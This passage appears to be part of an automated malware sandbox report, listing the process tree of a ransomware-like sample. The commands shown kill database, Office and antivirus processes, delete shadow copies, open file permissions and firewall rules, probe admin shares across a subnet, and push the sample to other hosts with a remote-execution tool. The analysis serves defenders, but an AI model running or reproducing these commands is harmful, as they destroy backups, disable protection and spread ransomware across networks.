2⤵
PID:3860

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:1768

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:2704

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:3972

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:3904

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3636

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
PID:3936

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
PID:2136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:1652

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1768

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
PID:3904

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
PID:3968

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
PID:1232

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
PID:3196

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3904

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
PID:3964

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3872

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
PID:3332

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
PID:2836

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
PID:4008

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
PID:3136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
PID:3576

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
PID:3196

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
PID:2100

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:2784

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
PID:3932

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
PID:2736

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
PID:3828

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
PID:3480

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
PID:3944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1956

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
PID:1192

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
PID:1232

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3876

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
PID:1792

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
PID:2268

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3972

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:384

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
PID:3944

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3480

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
PID:2700

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
PID:2712

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
PID:1580

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:1680

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
PID:3044

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
PID:1652

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:2312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:2648

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3720

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:3400

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:4008

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\Users
2⤵
PID:1432

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\A$
2⤵
PID:2784

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\B$
2⤵
PID:3688

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\C$
2⤵
PID:3720

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\D$
2⤵
PID:424

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\E$
2⤵
PID:2164

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\F$
2⤵
PID:2736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\G$
2⤵
PID:3292

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\H$
2⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\I$
2⤵
PID:1672

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\J$
2⤵
PID:3916

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\Users
2⤵
PID:1792

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\K$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\A$
2⤵
PID:2268

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\L$
2⤵
PID:424

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\B$
2⤵
PID:3956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\M$
2⤵
PID:3960

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\C$
2⤵
PID:1232

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\N$
2⤵
PID:1672

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\D$
2⤵
PID:3968

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\N$
2⤵
PID:1956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\O$
2⤵
PID:2164

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\E$
2⤵
PID:3932

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\P$
2⤵
PID:2272

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\O$
2⤵
PID:3176

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:1476

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\P$
2⤵
PID:736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\F$
2⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\Q$
2⤵
PID:3196

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\G$
2⤵
PID:1468

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\Q$
2⤵
PID:1280

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\R$
2⤵
PID:3044

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\H$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\R$
2⤵
PID:1956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\S$
2⤵
PID:4028

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\S$
2⤵
PID:4040

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\I$
2⤵
PID:2072

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\T$
2⤵
PID:1680

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\T$
2⤵
PID:3660

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\J$
2⤵
PID:1576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\U$
2⤵
PID:2196

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\U$
2⤵
PID:940

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\V$
2⤵
PID:1280

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\V$
2⤵
PID:3720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\K$
2⤵
PID:3964

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\W$
2⤵
PID:1192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\L$
2⤵
PID:2648

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\W$
2⤵
PID:3132

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\X$
2⤵
PID:3784

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\M$
2⤵
PID:1652

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3968

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\X$
2⤵
PID:2200

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\Y$
2⤵
PID:3660

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\Y$
2⤵
PID:1576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\127.0.0.1\Z$
2⤵
PID:3172

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.10\Z$
2⤵
PID:2456

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.11\Users
2⤵
PID:4044

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:3972

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Users
2⤵
PID:2232

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\A$
2⤵
PID:1904

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\A$
2⤵
PID:1680

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\B$
2⤵
PID:3932

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\B$
2⤵
PID:424

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\C$
2⤵
PID:2176

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\C$
2⤵
PID:2180

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3400

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\D$
2⤵
PID:2456

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\D$
2⤵
PID:2104

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\E$
2⤵
PID:3816

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\E$
2⤵
PID:744

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\F$
2⤵
PID:3964

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\F$
2⤵
PID:2312

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\G$
2⤵
PID:3872

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\G$
2⤵
PID:2736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\H$
2⤵
PID:3576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\H$
2⤵
PID:3372

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\I$
2⤵
PID:940

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\I$
2⤵
PID:3916

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\J$
2⤵
PID:2236

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\J$
2⤵
PID:2832

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\K$
2⤵
PID:1956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\K$
2⤵
PID:2272

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\L$
2⤵
PID:2200

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\L$
2⤵
PID:3956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\M$
2⤵
PID:2104

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\M$
2⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:2696

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\N$
2⤵
PID:1936

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\N$
2⤵
PID:2072

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\O$
2⤵
PID:3044

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\O$
2⤵
PID:3736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\P$
2⤵
PID:2700

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\P$
2⤵
PID:3476

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Q$
2⤵
PID:1476

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Q$
2⤵
PID:2832

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\R$
2⤵
PID:1900

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\R$
2⤵
PID:2780

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:2460

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\S$
2⤵
PID:1232

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\S$
2⤵
PID:3720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\T$
2⤵
PID:3688

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\T$
2⤵
PID:2712

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\U$
2⤵
PID:3916

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\U$
2⤵
PID:1956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\V$
2⤵
PID:1936

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\V$
2⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:2164

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\W$
2⤵
PID:416

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\W$
2⤵
PID:424

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\X$
2⤵
PID:408

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\X$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Y$
2⤵
PID:3488

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Y$
2⤵
PID:2700

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Z$
2⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.15\Z$
2⤵
PID:2696

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.16\Users
2⤵
PID:736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2312

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.16\A$
2⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:3288

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.16\B$
2⤵
PID:1900

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\Users
2⤵
PID:1788

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\A$
2⤵
PID:3784

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\C$
2⤵
PID:2280

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\B$
2⤵
PID:2232

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\D$
2⤵
PID:1956

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\C$
2⤵
PID:2700

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\E$
2⤵
PID:1192

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\D$
2⤵
PID:3332

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\F$
2⤵
PID:1280

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\E$
2⤵
PID:2712

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\G$
2⤵
PID:1756

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1672

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\F$
2⤵
PID:2012

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\H$
2⤵
PID:3816

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\G$
2⤵
PID:1576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\I$
2⤵
PID:3196

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\H$
2⤵
PID:3168

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\J$
2⤵
PID:960

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\I$
2⤵
PID:4044

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\K$
2⤵
PID:3660

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\J$
2⤵
PID:3688

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\L$
2⤵
PID:2780

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\K$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\N$
2⤵
PID:3136

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\M$
2⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:2748

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\L$
2⤵
PID:4072

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\O$
2⤵
PID:3004

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\N$
2⤵
PID:2104

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\M$
2⤵
PID:1988

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\P$
2⤵
PID:3688

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\O$
2⤵
PID:3816

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\Q$
2⤵
PID:3288

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\P$
2⤵
PID:3324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1680

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.14\R$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\Users
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\Q$
2⤵
PID:836

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\S$
2⤵
PID:3484

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\R$
2⤵
PID:1988

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\A$
2⤵
PID:3944

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\T$
2⤵
PID:2912

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\S$
2⤵
PID:2696

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\U$
2⤵
PID:940

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\B$
2⤵
PID:3288

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\T$
2⤵
PID:3132

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\V$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\C$
2⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:4072

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\U$
2⤵
PID:1192

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\W$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\D$
2⤵
PID:3916

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\X$
2⤵
PID:3780

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\V$
2⤵
PID:3324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\E$
2⤵
PID:3292

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\Y$
2⤵
PID:3980

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\W$
2⤵
PID:736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\F$
2⤵
PID:1164

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\Z$
2⤵
PID:3612

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\G$
2⤵
PID:424

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1432

